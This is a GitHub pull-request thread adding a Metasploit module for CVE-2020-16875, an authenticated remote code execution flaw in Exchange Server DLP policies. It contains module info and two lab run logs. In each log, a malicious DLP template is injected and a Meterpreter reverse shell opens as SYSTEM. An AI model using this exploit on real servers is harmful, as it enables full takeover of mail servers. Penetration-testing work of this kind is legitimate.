Add Microsoft Exchange Server DLP Policy RCE (CVE-2020-16875)

[wvu]

Requires #14139!

Info

msf6 exploit(windows/http/exchange_ecp_dlp_policy) > info

       Name: Microsoft Exchange Server DlpUtils AddTenantDlpPolicy RCE
     Module: exploit/windows/http/exchange_ecp_dlp_policy
   Platform: Windows
       Arch: x86, x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2020-09-08

Provided by:
  mr_me
  wvu <wvu@metasploit.com>

Module side effects:
 ioc-in-logs
 account-lockouts
 config-changes
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Exchange Server 2016 and 2019 w/o KB4577352

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD                    no        OWA password
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      443              yes       The target port (TCP)
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       Base path
  USERNAME                    no        OWA username
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This vulnerability allows remote attackers to execute arbitrary code
  on affected installations of Exchange Server. Authentication is
  required to exploit this vulnerability. Additionally, the target
  user must have the "Data Loss Prevention" role assigned and an
  active mailbox. If the user is in the "Compliance Management" or
  greater "Organization Management" role groups, then they have the
  "Data Loss Prevention" role. Since the user who installed Exchange
  is in the "Organization Management" role group, they transitively
  have the "Data Loss Prevention" role. The specific flaw exists
  within the processing of the New-DlpPolicy cmdlet. The issue results
  from the lack of proper validation of user-supplied template data
  when creating a DLP policy. An attacker can leverage this
  vulnerability to execute code in the context of SYSTEM. Tested
  against Exchange Server 2016 CU14 on Windows Server 2016.

References:
  https://cvedetails.com/cve/CVE-2020-16875/
  https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16875
  https://support.microsoft.com/en-us/help/4577352/security-update-for-exchange-server-2019-and-2016
  https://srcincite.io/advisories/src-2020-0019/
  https://srcincite.io/pocs/cve-2020-16875.py.txt
  https://srcincite.io/pocs/cve-2020-16875.ps1.txt

msf6 exploit(windows/http/exchange_ecp_dlp_policy) >

Exploit

msf6 exploit(windows/http/exchange_ecp_dlp_policy) > run

[*] Started HTTPS reverse handler on https://192.168.123.1:8443
[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated. OWA is running at https://192.168.123.192/owa/
[*] Logging in to OWA with creds Administrator:Passw0rd!
[+] Successfully logged in to OWA
[*] Retrieving ViewState from DLP policy creation page
[+] Successfully retrieved ViewState
[*] Creating custom DLP policy from malicious template
[*] DLP policy name: Abbotstone Agricultural Property Unit Trust Data
[*] Powershell command length: 2372
[*] https://192.168.123.1:8443 handling request from 192.168.123.192; (UUID: rwlz4ahe) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 1 opened (192.168.123.1:8443 -> 192.168.123.192:6951) at 2020-09-16 02:39:17 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-365Q2VJJS17
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : GIBSON
Logged On Users : 8
Meterpreter     : x64/windows
meterpreter >

[label-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[smcintyre-r7]

Tested successfully from a combined branch of 14126 + 14139

msf6 exploit(windows/http/exchange_ecp_dlp_policy) > run

[*] Started reverse TCP handler on 192.168.159.128:8443 
[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated. OWA is running at https://192.168.159.53/owa/
[*] Logging in to OWA with creds alice:Password1
[+] Successfully logged in to OWA
[*] Retrieving ViewState from DLP policy creation page
[+] Successfully retrieved ViewState
[*] Creating custom DLP policy from malicious template
[*] DLP policy name: Abn Amro Hoare Govett Limited Data
[*] Powershell command length: 2092
[*] Sending stage (200262 bytes) to 192.168.159.53
[*] Meterpreter session 1 opened (192.168.159.128:8443 -> 192.168.159.53:6911) at 2020-09-16 12:32:55 -0400


meterpreter > 
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-GD5KVDKUNIP
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : EXCHG
Logged On Users : 11
Meterpreter     : x64/windows
meterpreter >

[smcintyre-r7]

Retested this just now with the latest changes that addressed my comments and everything is still working so I'm going to go ahead and get this landed momentarily.

[smcintyre-r7]

Release Notes

New module exploits/windows/http/exchange_ecp_dlp_policy adds an authenticated RCE exploit for Microsoft Exchange which leverages the flaw identified as CVE-2020-16875 to inject code when processing a new DLP policy. The user must have the "Data Loss Prevention" role assigned in order to exploit this vulnerability.